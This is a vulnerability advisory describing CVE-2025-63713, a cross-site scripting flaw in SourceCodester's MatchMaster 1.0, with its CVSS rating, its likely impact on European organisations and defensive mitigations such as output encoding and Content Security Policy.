CVE-2025-63713 identifies a Cross-Site Scripting (XSS) vulnerability in SourceCodester's MatchMaster version 1.0, a web-based application designed for creating custom matching tests. The vulnerability stems from the application's failure to properly sanitize user-supplied input fields, specifically test titles and matching pair items, before rendering them in the Document Object Model (DOM) during test execution. This improper input handling allows remote attackers to inject arbitrary JavaScript or HTML code by submitting crafted inputs through the custom test creation feature. When a victim loads the affected test, the malicious script executes in their browser context, potentially leading to session hijacking, credential theft, or unauthorized actions performed on behalf of the user. The vulnerability does not require authentication but does require user interaction to trigger the malicious payload. The CVSS v3.1 base score is 6.1, reflecting a medium severity level, with the vector indicating network attack vector (AV:N), low attack complexity (AC:L), no privileges required (PR:N), user interaction required (UI:R), scope changed (S:C), and low impact on confidentiality and integrity (C:L/I:L) but no impact on availability (A:N). No known exploits have been reported in the wild, and no official patches have been released at the time of publication. The vulnerability is categorized under CWE-79, which covers improper neutralization of input during web page generation. The threat primarily affects environments where MatchMaster 1.0 is deployed, typically educational institutions or organizations using this platform for testing purposes.

For European organizations, the impact of CVE-2025-63713 depends on the extent of MatchMaster 1.0 deployment, primarily in educational or training contexts. Successful exploitation could lead to unauthorized script execution in users' browsers, potentially resulting in theft of session cookies, user credentials, or manipulation of test content. This compromises confidentiality and integrity of user data and test results. Although availability is not affected, the trustworthiness of the testing platform could be undermined, leading to reputational damage and potential regulatory scrutiny under GDPR if personal data is exposed. The requirement for user interaction limits large-scale automated exploitation but targeted phishing or social engineering attacks could be effective. The lack of authentication requirement increases the attack surface, allowing external attackers to craft malicious tests accessible to unsuspecting users. Organizations relying on MatchMaster for critical assessments or certification risk disruption and data compromise, which could affect operational continuity and compliance obligations.

To mitigate CVE-2025-63713, organizations should implement robust input validation and output encoding on all user-supplied data fields, especially test titles and matching pair items. Employ a whitelist approach to restrict allowable characters and sanitize inputs to neutralize potentially malicious scripts. Apply context-aware output encoding (e.g., HTML entity encoding) before rendering data in the DOM. Implement Content Security Policy (CSP) headers to restrict execution of unauthorized scripts and reduce XSS impact. Where possible, update or patch the MatchMaster application once vendor fixes become available. In the interim, restrict access to the custom test creation feature to trusted users and monitor logs for suspicious input patterns. Educate users about phishing risks and the dangers of interacting with untrusted test content. Conduct regular security assessments and penetration testing focused on web application input handling. Additionally, consider deploying web application firewalls (WAFs) with XSS detection rules tailored to the application’s behavior to provide an additional layer of defense.